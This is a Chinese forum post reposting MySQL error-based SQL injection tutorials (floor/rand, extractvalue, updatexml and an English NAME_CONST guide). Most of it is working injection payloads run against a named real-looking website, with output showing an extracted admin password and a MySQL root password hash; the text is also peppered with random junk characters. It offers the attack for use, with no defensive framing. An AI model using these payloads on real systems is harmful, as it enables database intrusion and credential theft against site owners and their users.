|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
; Y% L4 Y. |# x首先进行正常查询: mysql> select * from article where id = 1;
. ?; \& n( B$ _6 M0 F+—-+——-+———+" T, z7 d4 V4 P1 c6 S
| id | title | content |- V+ u& K4 V; _9 g8 ]
+—-+——-+———+
. v8 v# X' p0 z8 B: c* |4 z| 1 | test | do it |4 g: X) L2 L+ q6 d/ }
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);- s: K5 m% ]4 O/ F) [2 U
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。. G' p K# m6 ?- b7 m& V0 R% G* F
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);0 F; C7 S) m& P) j" |7 @" G
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));2 W$ n( B+ ^) m% O
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue/ W( g# i o/ X% f
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–8 K' a9 [; E% g. g2 W' t @1 G( c
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
! p. F# C* K2 g1 m8 J6 D* J4 O
+ x% ?& |- N2 Y* {, |7 ^再收集:
7 J9 L, q9 W$ t4 C9 }http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
- d: j0 A! s- p
3 I k9 n! W0 H% UError uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
. r* }: ?" y% p- ~& Q4 R2 q1 t, f; b6 P$ y4 C
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)8 H9 s" w& o- L" t9 w; n
( d: F1 m5 i6 K% S, h* |Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ / i" `! ~0 ^$ h5 o3 P
) ?( N# j* B: l4 [9 K9 @- NMYSQL高版本报错注入技巧-利用NAME_CONST注入
2 Y0 R5 W6 l3 C2 D! Y4 ^* ^It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
3 U2 r! R: f2 j3 t; p9 M: n
; y2 [8 h/ f0 _, [* O- t3 }8 T6 ]
; x4 }# O4 l, n# u相关信息
1 v: R/ Q* E7 R
. d( H' s) z, K; ]2 `NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.1 f! k* R: ?' q* X- i' d. t7 C
" x# v+ l/ o. W
Code:4 b9 u7 c1 S. d' u( T+ C- T* T
NAME_CONST(DATA, VALUE)4 \$ p v. T2 ^; c z! D
1 c) V1 }3 C$ y7 `
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants." r' z0 k0 z! Z' n( ]/ D' d
- X. E8 i+ s4 L7 x- ~; pSELECT NAME_CONST('TEST', 1)
# d/ P$ A( q. B: u. @ b1 T
8 i0 _- C8 h- k2 A6 ~
9 k; A6 T8 I6 R/ h. U7 \7 m* p( B6 ]7 q0 S) S) f: W7 p
|---------------|
9 C9 L* b% a0 h. P+ Q| TEST |4 ]4 x9 R& N* k2 m8 H
| |
( Y1 K1 y6 R& j' w+ U" t% o) O|---------------|3 ^' W0 z ~- t7 H t# P. ]
| 1 |
R" O7 _* E8 w$ v/ t L: l| |' _6 r; o! \2 B5 i
|---------------|
9 Y# z, J. k+ E; `3 Y
! x0 v j) K" \ W- K! `/ w$ }; `1 m. j" ~ C# R7 o ]
% D; B' M0 Y( a* E* T! J& z2 I/ ]/ t8 T4 [6 Y, T
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
$ p4 ], R% a4 B$ H9 I& xIntro to MySQL Variables9 ^3 g5 O# N& k" u
* Q0 T4 W9 T+ \# H KOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
- z9 E& V" }& s7 K$ r7 ^1 N/ Q* \( a, `* @( D% W
Code:! V3 g: m f0 i: ^, M2 H# G
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
G6 l8 g4 a: g; f" d4 A: Q3 Y9 f) r
, x8 |! @, E, j' ?
6 g. W) g- n3 z& p9 s. P! c$ U$ {' Y
5 w7 S7 B2 i0 k1 {1 r* e5 pCode:& y2 @. e9 v/ F- A0 U3 ^
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
3 O. p) b% r, D7 R# s" B
, `" c: ?) o4 K' F( U$ H, o
" h% ^/ Z) B% D9 B% jVAR = Your MySQL variable.5 t2 U7 K6 a# \5 R
1 c( q7 \/ a( n( j% c$ ]+ y3 a ~
MySQL 5.1.3 Server System Variables0 ~4 L% b H. ?; i% f( B9 v) |: Q# {
* R7 e& R( ` Z% J3 f' X
Let's try it out on my site..
& z4 }7 W: \/ S7 l: p; O- j$ L4 M% G
! ^( }( x2 k5 g/ L* U) ? T" q4 UCode:
: E: E# p4 d. Ehttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--) F7 B B1 @; P* e! T8 T. m
# b( J& W- w: Q; L* n, k2 OErroruplicate column name '5.0.27-community-nt'9 [0 T8 p q% T6 U' q) T" Q1 F
" F; B/ {/ w# `2 z: o( n2 s% ~; X
& A9 P& g8 Z3 `0 Y
- W' X: r3 Z8 N s
( L* \' `* [6 ?+ H- G, u
! e" P) ^ k* W; GNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
& b. t. D3 `- F+ f
6 x$ ^7 t6 a* I ]( X6 U! }: l9 [8 oData Extraction6 A1 N* f, s. b
9 m1 O* [; O+ p
Code:) b; a* Q2 X; Q+ n! v/ U
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
/ ]. G" `, r; i/ D( N" z1 [5 D. N" {& M- \" ` R. t& G; t
3 E: ?1 d Y6 D% F; q1 \7 a) z tWe should get a duplicate column 1 error...2 \5 y4 v7 X6 G$ {
! O" |1 F% ~* h# e( aCode:/ j5 S: d, B7 ^
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
" A6 J0 a8 @' h! n- q* g1 F4 j$ U n/ U- o
Erroruplicate column name '1
# K2 f7 A, b2 z6 s3 n
/ Y* ?7 M' c$ ]& ~7 [0 b
6 x- @- \1 r; Q/ x' C k$ |! e. C( f1 C
5 h8 W5 ]! d$ T* D; Q9 ]
2 Y8 Q+ Q0 W; n0 f4 ^- F. m+ U: [
2 s( _* J3 A% I j1 cNow let's get the tables out this bitch..( S) F5 i1 F3 |4 j
2 a& v8 H: k" D% I9 g5 h* r( X' eCode:( a* v# Q5 \; d8 Y. J* F6 a
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--- v' l7 B: e" e- p8 B
' R+ ]# k9 u5 ~8 P! G* d: t, }9 i
0 U5 D; H/ q' z9 n0 s0 P f8 wLet's see if it works here, if it does, we can go on and finish the job.
: g7 s6 m/ a/ o* j! a2 P l
+ B4 d" M' Z8 p8 a. @. O4 Z3 p6 M: rCode: h2 o1 D( w6 p# p
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
% b3 R6 C) Y; q1 \
! W' }. \; O$ c/ `; ?5 u
0 w6 N* a l }3 w( jErroruplicate column name 'com_admanage1 A' J6 y0 I/ T; \
; M* c8 m9 }" d! N' y! o, }6 c1 U, y' ~6 _
! R- V5 X" T4 u5 c/ Q1 p( B7 E, G7 Y7 t2 G, c/ u. J6 ?
9 S4 p& D( x) t, H
% A' A+ k" }2 @8 ZNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.
) B M2 M5 U% ?9 D) V1 r! B3 d) x- |+ k. T6 J: ~2 C$ T: F( Q
Let's get the columns out of the user table..
* _" M- R, a: ^/ B1 h
' p: b& |: T2 {$ R7 e% N1 r- S8 XCode:& Y& o/ Q& W8 o: r% c, v1 ~
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--# i5 _1 b" Z( E& h
7 [* S' E M2 B) q% A' r& j v$ }5 G% s4 z; \+ n5 Q8 d" Q' S
So mine looks like this, and I get the duplicate column name 'Host'.. M: h ?6 A9 p6 \7 m
9 a+ @: v7 V" J- @- h
Code:
4 m+ B @( v$ i9 x* k. s Xhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--: u! g& W0 ^) S( ?
: I- S+ H+ f$ c
Erroruplicate column name 'Host'
. f+ A& M( r" c! ?2 u0 f
! j2 b& ^8 f& h1 B6 @2 H8 v, n
/ M1 ?! o9 n' y8 I- l1 i4 g3 C$ F( g$ y$ c" o+ v6 r. B2 t
" l5 `1 M6 B# M- ~8 k3 L7 n
2 C7 S; F+ K; O1 {( T5 e3 X( a. R9 z# E1 }# O+ d4 }4 h5 N; V
Woot, time to finish this bitch off.2 ^$ }4 P" {+ g) ^
; ]* @, C u) r. T! ]Code:0 Q( C& d4 {2 R, u {- n0 n
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--0 l" r# S6 C6 ]$ \7 y
: r# D, c2 L# M0 L1 _- i' r/ |. E$ i% L
So mine looks like this...
3 z% j" p1 d9 r! x3 V2 A$ I2 l
z2 u- P0 G* R+ ?9 kCode: J5 _& K6 n {& C$ G
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
+ W# C2 S! ^, v$ M. M# O O1 c t/ q. M. l0 Z, x
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
. H# a6 ~5 F+ e" g
, y$ c2 T! f; w8 A" C u. r; W( Y' s3 o
- f' m' D+ w6 ^& }1 S
% {6 g: p9 A/ a U- N
! [; T/ ^ H' X0 C2 y, g7 r* q
+ e9 o! w6 B# a, l( ]& W
And there we have it, thanks for reading.
/ R2 u+ C6 v7 o; B3 J$ R& P- y2 R
+ A4 w$ A" ?% s, n5 r$ m: I, z. k |
发表于 2015-11-11 19:03:37
收藏
支持
反对